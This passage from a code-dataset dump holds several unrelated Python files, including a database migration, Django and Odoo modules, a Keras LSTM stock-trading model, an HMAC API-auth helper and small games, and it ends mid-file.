print(i)\r\n# # print(np.any(pd.DataFrame(oapi.get_structures(i+1))['id']==182305696))\r\n","sub_path":"compute_volumes_mouse.py","file_name":"compute_volumes_mouse.py","file_ext":"py","file_size_in_byte":59235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"175864151","text":"from sqlalchemy import *\nfrom migrate import *\n\n\nfrom migrate.changeset import schema\npre_meta = MetaData()\npost_meta = MetaData()\ncompany = Table('company', post_meta,\n Column('id', INTEGER, primary_key=True, nullable=False),\n Column('name', VARCHAR(length=55)),\n Column('city', VARCHAR(length=55)),\n Column('state', VARCHAR(length=10), default=ColumnDefault('CA')),\n Column('zipcode', VARCHAR(length=15)),\n)\n\nnote = Table('note', post_meta,\n Column('id', INTEGER, primary_key=True, nullable=False),\n Column('appt_id', INTEGER),\n Column('client_id', INTEGER),\n Column('therapist_id', INTEGER),\n Column('note', Text),\n Column('created_date', DATETIME),\n)\n\nclient_eval = Table('client_eval', pre_meta,\n Column('id', INTEGER(), primary_key=True, nullable=False),\n Column('client_id', INTEGER()),\n Column('eval_type_id', INTEGER()),\n Column('therapist_id', INTEGER()),\n Column('created_date', TIMESTAMP, nullable=False),\n)\n\nclient_auth = Table('client_auth', pre_meta,\n Column('id', INTEGER(), primary_key=True, nullable=False),\n Column('client_id', INTEGER()),\n Column('auth_start', DATETIME),\n Column('auth_end', DATETIME),\n Column('auth_id', INTEGER()),\n Column('monthly_visits', INTEGER()),\n)\n\nclient_auth = Table('client_auth', post_meta,\n Column('id', INTEGER, primary_key=True, nullable=False),\n Column('client_id', INTEGER),\n Column('therapist_id', INTEGER),\n Column('auth_start_date', DATETIME),\n Column('auth_end_date', DATETIME),\n Column('auth_id', INTEGER),\n Column('monthly_visits', INTEGER),\n Column('created_date', DATETIME),\n)\n\n\ndef upgrade(migrate_engine):\n # Upgrade operations go here. Don't create your own engine; bind\n # migrate_engine to your metadata\n pre_meta.bind = migrate_engine\n post_meta.bind = migrate_engine\n post_meta.tables['company'].create()\n post_meta.tables['note'].create()\n pre_meta.tables['client_eval'].columns['eval_type_id'].drop()\n pre_meta.tables['client_auth'].columns['auth_end'].drop()\n pre_meta.tables['client_auth'].columns['auth_start'].drop()\n post_meta.tables['client_auth'].columns['auth_end_date'].create()\n post_meta.tables['client_auth'].columns['auth_start_date'].create()\n post_meta.tables['client_auth'].columns['created_date'].create()\n post_meta.tables['client_auth'].columns['therapist_id'].create()\n\n\ndef downgrade(migrate_engine):\n # Operations to reverse the above upgrade go here.\n pre_meta.bind = migrate_engine\n post_meta.bind = migrate_engine\n post_meta.tables['company'].drop()\n post_meta.tables['note'].drop()\n pre_meta.tables['client_eval'].columns['eval_type_id'].create()\n pre_meta.tables['client_auth'].columns['auth_end'].create()\n pre_meta.tables['client_auth'].columns['auth_start'].create()\n post_meta.tables['client_auth'].columns['auth_end_date'].drop()\n post_meta.tables['client_auth'].columns['auth_start_date'].drop()\n post_meta.tables['client_auth'].columns['created_date'].drop()\n post_meta.tables['client_auth'].columns['therapist_id'].drop()\n","sub_path":"db_repository/versions/020_migration.py","file_name":"020_migration.py","file_ext":"py","file_size_in_byte":3094,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"461516502","text":"import ast\nimport math\nfrom collections import defaultdict\nfrom typing import List, Dict, Sequence\nimport pickle\n\nimport numpy as np\nimport pandas as pd\nfrom tqdm import tqdm\n\nimport sketch.compress_freq as cf\nimport sketch.sketch_frequent as f\nimport sketch.compress_dyadic as dyadic\nimport linear_bench\n\n\ndef combine_counts(counts: Sequence[Dict]):\n combined = dict()\n for cur_count in counts:\n for k,v in cur_count.items():\n combined[k] = combined.get(k, 0) + v\n return combined\n\n\ndef count_to_vec(x_to_track, x_counts: Dict) -> np.ndarray:\n counts = np.array([x_counts.get(x, 0) for x in x_to_track])\n return counts\n\n\ndef rmse(x):\n return np.sqrt(np.mean(x**2))\n\n\nclass LinearBenchProcessor:\n def __init__(\n self,\n x_to_track\n ):\n self.x_to_track = x_to_track\n\n def calc_range_query(\n self,\n summary_list: List[Dict],\n method_name: str,\n start_idx: int,\n end_idx: int\n ) -> np.ndarray:\n pass\n\n def calc_cum_query(\n self,\n summary_list: List[Dict],\n method_name: str,\n start_idx,\n end_idx\n ):\n cum_results = []\n if \"dyadic\" in method_name:\n dyadic_values = {}\n for cur_result in summary_list:\n cur_method = cur_result[\"method\"]\n cur_idx = cur_result[\"seg_idx\"]\n cur_counts = cur_result[\"counts\"]\n\n if cur_method == method_name:\n c_height, c_start_idx = cur_idx\n if (start_idx <= c_start_idx < end_idx and\n start_idx-1 <= c_start_idx - 2**c_height):\n dyadic_values = {\n (h, s_idx): counts for ((h, s_idx), counts) in dyadic_values.items()\n if s_idx > c_start_idx or s_idx - 2**h < c_start_idx - 2**c_height\n }\n dyadic_values[(c_height, c_start_idx)] = cur_counts\n new_final_count = count_to_vec(self.x_to_track, combine_counts(dyadic_values.values()))\n # new_final_count = self.count_to_vec(combine_counts(dyadic_values.values()))\n if (c_start_idx-start_idx) >= len(cum_results):\n cum_results.append(new_final_count)\n else:\n cum_results[c_start_idx-start_idx] = new_final_count\n else:\n cur_total = 0\n for cur_result in summary_list:\n cur_method = cur_result[\"method\"]\n cur_idx = cur_result[\"seg_idx\"]\n cur_counts = cur_result[\"counts\"]\n if cur_method == method_name and start_idx <= cur_idx < end_idx:\n # cur_total += self.count_to_vec(cur_counts)\n cur_total += count_to_vec(self.x_to_track, cur_counts)\n cum_results.append(np.copy(cur_total))\n return cum_results\n\n\ndef run_grains(dataset=\"caida\", x_track_file=None):\n grains = [8, 32, 128, 512, 2048]\n methods = [\n \"incremental\",\n \"pps\",\n \"cms_min\",\n \"random_sample\",\n \"truncation\",\n \"dyadic_truncation\",\n \"topvalue\",\n \"zero_est\"\n ]\n if x_track_file is None:\n x_to_track = list(range(1,401))\n else:\n x_df = pd.read_csv(x_track_file)\n x_to_track = x_df[\"x_track\"].values\n x_to_track = np.sort(x_to_track)\n proc = LinearBenchProcessor(x_to_track=x_to_track)\n for cur_grain in grains:\n print(\"Grain: {}\".format(cur_grain))\n cur_results = None\n with open(\"output/grain_{}_{}.out\".format(dataset, cur_grain)) as f:\n cur_results = ast.literal_eval(f.read())\n\n start_idx = cur_grain//2\n end_idx = cur_grain\n cum_method_results = dict()\n for cur_method in methods:\n if cur_method == \"zero_est\":\n cum_results = [np.zeros(len(x_to_track)) for _ in range(end_idx-start_idx)]\n else:\n cum_results = proc.calc_cum_query(cur_results, cur_method, start_idx, end_idx)\n # cum_results = [\n # list(i) for i in proc.calc_cum_query(cur_results, cur_method, start_idx, end_idx)\n # ]\n cum_method_results[cur_method] = cum_results\n with open(\"output/cum_{}_{}.out\".format(dataset, cur_grain), \"wb\") as f:\n pickle.dump(cum_method_results, f, protocol=0)\n\n\ndef test():\n results = linear_bench.run_test_bench()\n proc = LinearBenchProcessor(x_to_track=range(1,6))\n cum_results = proc.calc_cum_query(results, \"topvalue\", 0, 4)\n print(cum_results)\n cum_results = proc.calc_cum_query(results, \"dyadic_truncation\", 0, 4)\n print(cum_results)\n\n\ndef main():\n # run_grains(\"caida\", \"notebooks/caida1M-xtrack.csv\")\n run_grains(\"zipf\", \"notebooks/zipf10M-xtrack.csv\")\n # run_grains(\"caida10M\", \"/Users/edwardgan/Documents/Projects/datasets/caida-pcap/caida10M-ipdst-xtrack.csv\")\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"python/process_linear_out.py","file_name":"process_linear_out.py","file_ext":"py","file_size_in_byte":5130,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"445718777","text":"from sys import stdout\n\nfrom django.core.management.base import BaseCommand\n\nfrom PlagCheck.verification import plagcheck_elaboration, plagcheck_check_unverified\nfrom Elaboration.models import Elaboration\n\nclass Command(BaseCommand):\n help = 'Reinserts all elaborations and triggers a plagiarism check for documents which haven\\'t checked yet'\n\n def handle(self, *args, **options):\n\n elaborations = Elaboration.objects.all().order_by('submission_time')\n count = elaborations.count()\n counter = 0\n for elab in elaborations:\n counter += 1\n percent = (100.0 / count) * counter\n stdout.write(\"\\rAdding elaboration {0} of {1} ({2:6.2f}%)\".format(counter, count, percent))\n stdout.flush()\n plagcheck_elaboration(elab, store_only=True)\n stdout.write(\"\\n\")\n\n plagcheck_check_unverified()\n","sub_path":"PlagCheck/management/commands/plagcheck_check_missing.py","file_name":"plagcheck_check_missing.py","file_ext":"py","file_size_in_byte":883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"553097709","text":"from django.conf.urls import patterns, include, url\nfrom django.contrib import admin\n\nfrom EnglishStudy_Web import views\n\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n # Examples:\n # url(r'^$', 'EnglishStudy_Web.views.home', name='home'),\n # url(r'^blog/', include('blog.urls')),\n\n url(r'^$', views.IndexView.as_view(), name='home'),\n\n # /tracnghiem\n url(r'^tracnghiem/', include('tracnghiem.urls', namespace='tracnghiem')),\n\n # /accounts\n url(r'^accounts/', include('accounts.urls', namespace='accounts')),\n\n # /about\n url(r'^about/', 'EnglishStudy_Web.views.about', name='about'),\n\n # /polls - example polls application\n url(r'^polls/', include('polls.urls', namespace='polls')),\n\n # /admin - Django built-in interactive Admin page\n url(r'^admin/', include(admin.site.urls)),\n)\n\nfrom django.contrib.staticfiles.urls import staticfiles_urlpatterns\nurlpatterns += staticfiles_urlpatterns()\n\n","sub_path":"EnglishStudy_Web/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"51242636","text":"\"\"\"This module contains a class for managing and running PyFilter filter\nactions.\n\n\"\"\"\n# =============================================================================\n# IMPORTS\n# =============================================================================\n\n# Standard Library Imports\nimport argparse\nimport logging\nimport json\n\n# Houdini Toolbox Imports\nfrom ht.pyfilter.logger import logger\n\n# =============================================================================\n# CLASSES\n# =============================================================================\n\nclass PyFilterManager(object):\n \"\"\"Manager class for PyFilter operations.\"\"\"\n\n def __init__(self):\n self._data = {}\n self._operations = []\n\n # Populate the list of operations.\n self._registerOperations()\n\n # Build and parse any arguments.\n self._parsePyFilterArgs()\n\n # =========================================================================\n # PROPERTIES\n # =========================================================================\n\n @property\n def data(self):\n \"\"\"Data dictionary that can be used to pass information.\"\"\"\n return self._data\n\n @property\n def operations(self):\n \"\"\"A list of registered operations.\"\"\"\n return self._operations\n\n # =========================================================================\n # NON-PUBLIC METHODS\n # =========================================================================\n\n def _parsePyFilterArgs(self):\n \"\"\"Parse any args passed to PyFilter.\"\"\"\n parser = argparse.ArgumentParser()\n\n self._registerParserArgs(parser)\n\n filter_args = parser.parse_known_args()[0]\n\n self._processParsedArgs(filter_args)\n\n def _processParsedArgs(self, filter_args):\n \"\"\"Allow operations to process any args that were parsed.\"\"\"\n for operation in self.operations:\n operation.processParsedArgs(filter_args)\n\n def _registerOperations(self):\n \"\"\"Register operations that should be run by the manager.\"\"\"\n import hou\n\n # Look for files containing a list of operations.\n try:\n files = hou.findFiles(\"pyfilter/operations.json\")\n\n # If no files could be found then abort.\n except hou.OperationFailed:\n return\n\n for filepath in files:\n with open(filepath) as fp:\n data = json.load(fp)\n\n if \"operations\" not in data:\n continue\n\n for operation in data[\"operations\"]:\n module_name, class_name = operation\n\n # Import the operation class.\n cls = getattr(\n __import__(module_name, {}, {}, [class_name]),\n class_name\n )\n\n logger.debug(\"Registering {}\".format(class_name))\n\n # Add an instance of it to our operations list.\n self.operations.append(cls(self))\n\n def _registerParserArgs(self, parser):\n \"\"\"Register any necessary args with our parser.\n\n This allows filter operations to have their necessary args parsed and\n available.\n\n \"\"\"\n for operation in self.operations:\n operation.registerParserArgs(parser)\n\n # =========================================================================\n # METHODS\n # =========================================================================\n\n def runFilters(self, stage, *args, **kwargs):\n \"\"\"Run all filter operations for the specified stage.\"\"\"\n results = []\n\n for operation in self.operations:\n # Skip operations that should not be run.\n if not operation.shouldRun():\n continue\n\n # Attempt to find the function for this stage.\n try:\n func = getattr(operation, stage)\n\n # Filter has no function for this stage so don't do anything.\n except AttributeError:\n continue\n\n # Run the filter.\n results.append(func(*args, **kwargs))\n\n return True in results\n\n","sub_path":"python/ht/pyfilter/manager.py","file_name":"manager.py","file_ext":"py","file_size_in_byte":4140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"600844202","text":"#!/usr/bin/env python3\n\nimport sys\nimport pygame\nfrom pygame.locals import *\n\n\nfrom screen import *\nfrom pieces import *\n\nchoosed = None\nismove = False\nside = 1\n\nwhile 1:\n display.blit(surf, png_rect)\n update_pieces()\n mouse_pos = pygame.mouse.get_pos()\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit(0)\n if event.type == pygame.KEYDOWN:\n if event.key == K_ESCAPE:\n sys.exit(0) \n if event.type == pygame.MOUSEBUTTONDOWN: \n if not choosed: \n choosed = check_pieces(mouse_pos, side)\n if choosed:\n ismove = True\n else:\n \n mouse_pos, i, j = calculate_pos(mouse_pos)\n\n possible_moves, attack_moves, castle_moves = choosed.possible_moves()\n if (i, j) in possible_moves: \n increase_move(choosed)\n\n choosed.x, choosed.y = i, j\n choosed.pos = mouse_pos\n \n side += 1\n elif (i, j) in attack_moves:\n increase_move(choosed)\n \n choosed.attack(i, j)\n choosed.x, choosed.y = i, j\n choosed.pos = mouse_pos\n side += 1\n elif (i, j) in castle_moves:\n increase_move(choosed)\n\n rock = castle_moves[(i, j)]\n \n if j < rock.y:\n rock.x, rock.y = i, j - 1\n else:\n rock.x, rock.y = i, j + 1\n\n choosed.x, choosed.y = i, j\n \n rock.pos = (board[rock.x][rock.y][0], board[rock.x][rock.y][1]) \n choosed.pos = mouse_pos\n side += 1\n \n else:\n choosed.pos = (board[choosed.x][choosed.y][0], board[choosed.x][choosed.y][1])\n choosed.choosed = False\n choosed = None\n ismove = False\n\n if ismove and choosed and 180 < mouse_pos[0] < 620 and 75 < mouse_pos[1] < 520:\n choosed.pos = (mouse_pos[0]-30, mouse_pos[1]-30)\n\n pygame.display.flip()\n clock.tick(30)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"124785621","text":"import random\ndinheiro=100\nprint(\"Ola jogador 1, voce possui {0} dinheiros\".format(dinheiro))\n\nwhile dinheiro > 0:\n aposta=int(input(\"faça sua aposta: \"))\n a= random.randint(0,36)\n print(a)\n #aposta= int(input(\"Digite sua aposta: \"))\n aposta1=input(\"a aposta é um numero ou paridade? \")\n if aposta == 0:\n dinheiro=0\n else:\n if aposta1 == \"n\":\n numero_aleatorio= input(\"digite um numero entre 1 e 36: \")\n if numero_aleatorio == a:\n dinheiro= dinheiro+(35*aposta)\n print(\"voce ganhou! seu saldo agora é {0}\".format(dinheiro))\n else:\n dinheiro= dinheiro - aposta\n print(\"voce perdeu, seu saldo agora é {0}\".format(dinheiro))\n elif aposta1 == \"p\":\n aposta2= input(\"voce quer impar ou par? \")\n if aposta2== \"i\":\n if a%2 == 0:\n dinheiro= dinheiro - aposta\n input(\"voce perdeu, seu saldo agora é {0}\".format(dinheiro))\n else:\n dinheiro= dinheiro + aposta\n input(\"voce ganhou! seu saldo agora é {0}\".format(dinheiro))\n else:\n if a%2 != 0:\n dinheiro= dinheiro - aposta\n input(\"voce perdeu, seu saldo agora é {0}\".format(dinheiro))\n else:\n dinheiro= dinheiro + aposta\n input(\"voce ganhou! seu saldo agora é {0}\".format(dinheiro))\n","sub_path":"backup/user_257/ch120_2020_10_07_01_23_28_292447.py","file_name":"ch120_2020_10_07_01_23_28_292447.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"610632937","text":"import numpy\nfrom tensorflow.contrib.keras.python.keras.layers import Dense, LSTM, Activation, BatchNormalization, initializers, Dropout\nfrom tensorflow.contrib.keras.python.keras.models import Sequential, load_model\nfrom tensorflow.contrib.keras.python.keras.optimizers import RMSprop\nfrom tensorflow.contrib.keras.python.keras.initializers import Constant\nfrom tensorflow.contrib.keras.python.keras.callbacks import TensorBoard, ModelCheckpoint\nfrom dataset import DataSet\nfrom smarttrader import read_sample_data\nfrom chart import extract_feature\nfrom tensorflow.contrib.keras.python.keras import backend as K\n\n\ndef relu_limited(x, alpha=0., max_value=1.):\n return K.relu(x, alpha=alpha, max_value=max_value)\n\n\ndef risk_estimation(y_true, y_pred):\n return -100. * K.mean((y_true - 0.0002) * y_pred)\n\n\nclass WindPuller(object):\n def __init__(self, input_shape, lr=0.01, n_layers=2, n_hidden=8, rate_dropout=0.2, loss=risk_estimation):\n print(\"initializing..., learing rate %s, n_layers %s, n_hidden %s, dropout rate %s.\" % (\n lr, n_layers, n_hidden, rate_dropout))\n self.model = Sequential()\n self.model.add(Dropout(rate=rate_dropout, input_shape=(input_shape[0], input_shape[1])))\n for i in range(0, n_layers - 1):\n self.model.add(LSTM(n_hidden * 4, return_sequences=True, activation='tanh',\n recurrent_activation='hard_sigmoid', kernel_initializer='glorot_uniform',\n recurrent_initializer='orthogonal', bias_initializer='zeros',\n dropout=rate_dropout, recurrent_dropout=rate_dropout))\n self.model.add(LSTM(n_hidden, return_sequences=False, activation='tanh',\n recurrent_activation='hard_sigmoid', kernel_initializer='glorot_uniform',\n recurrent_initializer='orthogonal', bias_initializer='zeros',\n dropout=rate_dropout, recurrent_dropout=rate_dropout))\n self.model.add(Dense(1, kernel_initializer=initializers.glorot_uniform()))\n # self.model.add(BatchNormalization(axis=-1, moving_mean_initializer=Constant(value=0.5),\n # moving_variance_initializer=Constant(value=0.25)))\n self.model.add(BatchNormalization(axis=-1))\n self.model.add(Activation(\"relu(alpha=0., max_value=1.0)\"))\n opt = RMSprop(lr=lr)\n self.model.compile(loss=loss,\n optimizer=opt,\n metrics=['accuracy'])\n\n def fit(self, x, y, batch_size=32, nb_epoch=100, verbose=1, callbacks=None,\n validation_split=0., validation_data=None, shuffle=True,\n class_weight=None, sample_weight=None, initial_epoch=0):\n self.model.fit(x, y, batch_size, nb_epoch, verbose, callbacks,\n validation_split, validation_data, shuffle, class_weight, sample_weight,\n initial_epoch)\n\n def save(self, path):\n self.model.save(path)\n\n def load_model(self, path):\n self.model = load_model(path)\n return self\n\n def evaluate(self, x, y, batch_size=32, verbose=1,\n sample_weight=None, **kwargs):\n return self.model.evaluate(x, y, batch_size, verbose,\n sample_weight)\n\n def predict(self, x, batch_size=32, verbose=0):\n return self.model.predict(x, batch_size, verbose)\n\n\ndef make_model(input_shape, train_set, test_set, nb_epochs=100, batch_size=128, lr=0.01, n_layers=1, n_hidden=16, rate_dropout=0.3):\n model_path = 'model.%s' % input_shape[0]\n wp = WindPuller(input_shape=input_shape, lr=lr, n_layers=n_layers, n_hidden=n_hidden, rate_dropout=rate_dropout)\n # train_set, test_set = read_feature(\"./ultimate_feature.%s\" % input_shape[0]) # read_ultimate(\"./\", input_shape)\n wp.fit(train_set.images, train_set.labels, batch_size=batch_size,\n nb_epoch=nb_epochs, shuffle=True, verbose=1,\n validation_data=(test_set.images, test_set.labels),\n callbacks=[TensorBoard(histogram_freq=1),\n ModelCheckpoint(filepath=model_path + '.best', save_best_only=True, mode='min')])\n scores = wp.evaluate(test_set.images, test_set.labels, verbose=0)\n print('Test loss:', scores[0])\n print('Test accuracy:', scores[1])\n\n wp.model.save(model_path)\n saved_wp = wp.load_model(model_path)\n scores = saved_wp.evaluate(test_set.images, test_set.labels, verbose=0)\n print('Test loss:', scores[0])\n print('test accuracy:', scores[1])\n pred = saved_wp.predict(test_set.images, 1024)\n # print(pred)\n # print(test_set.labels)\n pred = numpy.reshape(pred, [-1])\n result = numpy.array([pred, test_set.labels]).transpose()\n with open('output.' + str(input_shape[0]), 'w') as fp:\n for i in range(result.shape[0]):\n for val in result[i]:\n fp.write(str(val) + \"\\t\")\n fp.write('\\n')\n\n\ndef main(operation='train'):\n selector = [\"ROCP\", \"OROCP\", \"HROCP\", \"LROCP\", \"MACD\", \"RSI\", \"VROCP\", \"BOLL\", \"MA\", \"VMA\", \"PRICE_VOLUME\"]\n input_shape = [30, 61] # [length of time series, length of feature]\n raw_data = read_sample_data(\"toy_stock.csv\")\n moving_features, moving_labels = extract_feature(raw_data=raw_data, selector=selector, window=input_shape[0],\n with_label=True, flatten=False)\n moving_features = numpy.asarray(moving_features)\n moving_features = numpy.transpose(moving_features, [0, 2, 1])\n moving_labels = numpy.asarray(moving_labels)\n moving_labels = numpy.reshape(moving_labels, [moving_labels.shape[0], 1])\n validation_size = 600\n train_set = DataSet(moving_features[:-validation_size], moving_labels[:-validation_size])\n test_set = DataSet(moving_features[-validation_size:], moving_labels[-validation_size:])\n if operation == 'train':\n make_model(input_shape, train_set, test_set)\n\n\nif __name__ == '__main__':\n main(\"train\")\n","sub_path":"DeepTrader.py","file_name":"DeepTrader.py","file_ext":"py","file_size_in_byte":6006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"132205169","text":"# coding: utf-8\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport hashlib\nimport hmac\nfrom requests.utils import to_native_string\nimport time\n\nfrom requests.auth import AuthBase\n\n\nclass HMACAuth(AuthBase):\n def __init__(self, api_key, api_secret, api_version):\n self.api_key = api_key\n self.api_secret = api_secret\n self.api_version = api_version\n\n def __call__(self, request):\n timestamp = str(int(time.time() * 1000))\n message = timestamp + request.url + (request.body or '')\n secret = self.api_secret\n print(message)\n\n if not isinstance(message, bytes):\n message = message.encode()\n if not isinstance(secret, bytes):\n secret = secret.encode()\n\n signature = hmac.new(secret, message, hashlib.sha512).hexdigest()\n request.headers.update({\n to_native_string('BB-KEY'): self.api_key,\n to_native_string('BB-SIGNATURE'): signature,\n to_native_string('BB-NONCE'): timestamp,\n })\n print(request.headers)\n return request","sub_path":"bitbetween/auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":1090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"229850366","text":"import unittest\nfrom urllib.parse import urlparse, parse_qs, urlencode\n\nfrom flask import Response, json\nfrom flask.testing import FlaskClient\nfrom flask_jwt_extended import JWTManager, create_access_token\n\nimport server\n\n\nclass ApiTestCase(unittest.TestCase):\n \"\"\"Test case for server API\"\"\"\n\n def setUp(self):\n server.app.testing = True\n self.app = FlaskClient(server.app, Response)\n JWTManager(server.app)\n\n def tearDown(self):\n pass\n\n # submit query\n def test_permalink(self):\n testUrl = 'http://www.example.com/?arg=value'\n query = urlencode({'url': testUrl})\n data = {\n \"field1\": \"value1\",\n \"field2\": \"value2\"\n }\n response = self.app.post('/createpermalink?' + query, data=json.dumps(data),\n content_type='application/json')\n self.assertEqual(200, response.status_code, \"Status code is not OK\")\n\n response_data = json.loads(response.data)\n self.assertTrue(response_data)\n self.assertIn('permalink', response_data, 'Response has no permalink field')\n\n orig_parts = urlparse(testUrl)\n resp_parts = urlparse(response_data['permalink'])\n self.assertEqual(orig_parts.scheme, resp_parts.scheme, \"Permalink URL scheme mismatches\")\n self.assertEqual(orig_parts.netloc, resp_parts.netloc, \"Permalink URL netloc mismatches\")\n self.assertEqual(orig_parts.path, resp_parts.path, \"Permalink URL path mismatches\")\n self.assertIn('k', parse_qs(resp_parts.query), \"Permalink has no k query parameter\")\n\n query = urlencode({'key': parse_qs(resp_parts.query)['k'][0]})\n response = self.app.get('/resolvepermalink?' + query)\n self.assertEqual(200, response.status_code, \"Status code is not OK\")\n\n response_data = json.loads(response.data)\n self.assertTrue(response_data)\n self.assertIn('query', response_data, 'Response has no query field')\n self.assertIn('state', response_data, 'Response has no state field')\n self.assertEqual({'arg': 'value'}, response_data['query'], 'Response query mismatch')\n self.assertEqual(data, response_data['state'], 'Response state mismatch')\n","sub_path":"tests/api_tests.py","file_name":"api_tests.py","file_ext":"py","file_size_in_byte":2225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"388992846","text":"# -*- coding: utf-8 -*-\n##############################################################################\n#\n# OpenERP, Open Source Management Solution\n# Copyright (C) 2012-Today Serpent Consulting Services Pvt. Ltd. ()\n# Copyright (C) 2004 OpenERP SA ()\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see \n#\n##############################################################################\nfrom openerp.exceptions import except_orm, Warning\nfrom openerp import models,fields,api,_\nfrom openerp import netsvc\nimport datetime\nimport time\n\nclass hotel_floor(models.Model):\n\n _name = \"hotel.floor\"\n _description = \"Floor\"\n\n name = fields.Char('Floor Name', size=64, required=True, select=True)\n sequence = fields.Integer('Sequence', size=64)\n\nclass product_category(models.Model):\n\n _inherit = \"product.category\"\n\n isroomtype = fields.Boolean('Is Room Type')\n isamenitytype = fields.Boolean('Is Amenities Type')\n isservicetype = fields.Boolean('Is Service Type')\n\n\nclass hotel_room_type(models.Model):\n\n _name = \"hotel.room.type\"\n _description = \"Room Type\"\n\n cat_id = fields.Many2one('product.category','category', required=True, delegate=True, select=True, ondelete='cascade')\n\nclass product_product(models.Model):\n\n _inherit = \"product.product\"\n\n isroom = fields.Boolean('Is Room')\n iscategid = fields.Boolean('Is categ id')\n isservice = fields.Boolean('Is Service id')\n\nclass hotel_room_amenities_type(models.Model):\n\n _name = 'hotel.room.amenities.type'\n _description = 'amenities Type'\n\n cat_id = fields.Many2one('product.category','category', required=True, delegate=True, ondelete='cascade')\n\nclass hotel_room_amenities(models.Model):\n\n _name = 'hotel.room.amenities'\n _description = 'Room amenities'\n\n room_categ_id = fields.Many2one('product.product','Product Category' ,required=True, delegate=True, ondelete='cascade')\n rcateg_id = fields.Many2one('hotel.room.amenities.type','Amenity Catagory')\n\nclass hotel_room(models.Model):\n\n _name = 'hotel.room'\n _description = 'Hotel Room'\n\n product_id = fields.Many2one('product.product','Product_id' ,required=True, delegate=True, ondelete='cascade')\n floor_id = fields.Many2one('hotel.floor','Floor No',help='At which floor the room is located.')\n max_adult = fields.Integer('Max Adult')\n max_child = fields.Integer('Max Child')\n room_amenities = fields.Many2many('hotel.room.amenities','temp_tab','room_amenities','rcateg_id',string='Room Amenities',help='List of room amenities. ')\n status = fields.Selection([('available', 'Available'), ('occupied', 'Occupied')], 'Status',default='available')\n capacity = fields.Integer('Capacity')\n @api.multi\n def set_room_status_occupied(self):\n return self.write({'status': 'occupied'})\n\n @api.multi\n def set_room_status_available(self):\n return self.write({'status': 'available'})\n\n\nclass hotel_folio(models.Model):\n\n @api.multi\n def copy(self,default=None):\n '''\n @param self : object pointer\n @param default : dict of default values to be set\n '''\n return self.env['sale.order'].copy(default=default)\n\n @api.multi \n def _invoiced(self, name, arg):\n '''\n @param self : object pointer\n @param name: Names of fields.\n @param arg: User defined arguments\n '''\n return self.env['sale.order']._invoiced(name, arg)\n\n @api.multi\n def _invoiced_search(self ,obj, name, args):\n '''\n @param self : object pointer\n @param name: Names of fields.\n @param arg: User defined arguments\n '''\n return self.env['sale.order']._invoiced_search(obj, name, args)\n\n _name = 'hotel.folio'\n _description = 'hotel folio new'\n _rec_name = 'order_id'\n _order = 'id desc'\n\n name = fields.Char('Folio Number', size=24,default=lambda obj: obj.env['ir.sequence'].get('hotel.folio'),readonly=True)\n order_id = fields.Many2one('sale.order','Order', delegate=True, required=True, ondelete='cascade')\n checkin_date = fields.Datetime('Check In', required=True, readonly=True, states={'draft':[('readonly', False)]})\n checkout_date = fields.Datetime('Check Out', required=True, readonly=True, states={'draft':[('readonly', False)]})\n room_lines = fields.One2many('hotel.folio.line','folio_id', readonly=True, states={'draft': [('readonly', False)], 'sent': [('readonly', False)]}, help=\"Hotel room reservation detail.\")\n service_lines = fields.One2many('hotel.service.line','folio_id', readonly=True, states={'draft': [('readonly', False)], 'sent': [('readonly', False)]}, help=\"Hotel services detail provide to customer and it will include in main Invoice.\")\n hotel_policy = fields.Selection([('prepaid', 'On Booking'), ('manual', 'On Check In'), ('picking', 'On Checkout')], 'Hotel Policy',default='manual', help=\"Hotel policy for payment that either the guest has to payment at booking time or check-in check-out time.\")\n duration = fields.Float('Duration in Days', help=\"Number of days which will automatically count from the check-in and check-out date. \")\n\n @api.constrains('checkin_date','checkout_date')\n def check_dates(self):\n '''\n This method is used to validate the checkin_date and checkout_date.\n -------------------------------------------------------------------\n @param self : object pointer\n @return : raise warning depending on the validation\n '''\n if self.checkin_date >= self.checkout_date:\n raise except_orm(_('Warning'),_('Check in Date Should be less than the Check Out Date!'))\n\n @api.constrains('room_lines')\n def check_folio_room_line(self):\n '''\n This method is used to validate the room_lines.\n ------------------------------------------------\n @param self : object pointer\n @return : raise warning depending on the validation\n '''\n folio_rooms = []\n for room in self[0].room_lines:\n if room.product_id.id in folio_rooms:\n raise except_orm(_('Warning'),_('You Cannot Take Same Room Twice'))\n folio_rooms.append(room.product_id.id)\n\n @api.onchange('checkout_date','checkin_date')\n def onchange_dates(self):\n '''\n This mathod gives the duration between check in checkout if customer will leave only for some\n hour it would be considers as a whole day. If customer will checkin 